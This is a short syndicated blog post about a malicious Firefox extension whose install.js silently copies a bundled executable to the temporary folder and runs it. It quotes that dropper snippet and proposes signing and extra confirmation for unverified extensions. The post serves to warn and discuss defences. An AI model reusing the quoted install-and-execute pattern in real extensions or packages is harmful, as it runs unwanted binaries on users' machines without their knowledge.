This post originated from an RSS feed registered with Web Buzz
by Cheah Chu Yeow.
Original Post: Malicious XPIs run executable binaries
Feed Title: redemption in a blog
Feed URL: http://blog.codefront.net/xml/rss20/feed.xml
Feed Description: ramblings of a misfit - web development, Mozilla, Firefox, Thunderbird, CSS, programming
Flexer recently posted his encounter with a website that tried to get him to install a malicious XPI (Firefox extension). Upon the user clicking "Install", the install.js (the script that performs the actual installation) tries to execute the contained executable, which is xxxtoolbar, as Paradox52525 reports.
Here's a snippet of the code in the install.js:
var xpiSrc = "istinstall_netscape.exe";
initInstall("Adding a File",
"addFile",
"1.0.1.7",
1);
f = getFolder("Temporary");
setPackageFolder(f);
addFile(xpiSrc);
execute(xpiSrc,"",false);
Arthur_Dent breaks down exactly what the XPI and the contained executable does in his post.
Best solution, to me? Verified and digitally signed XPIs are allowed to run without hindrance. For unverified XPIs, warn the user that of that fact, and that the XPI will directly run executable code. Require an extra step of confirmation. That's what I think at the moment, but there are some pretty good ideas in that thread. It'll be interesting to see how this is dealt with in the near future.
Previous Topic
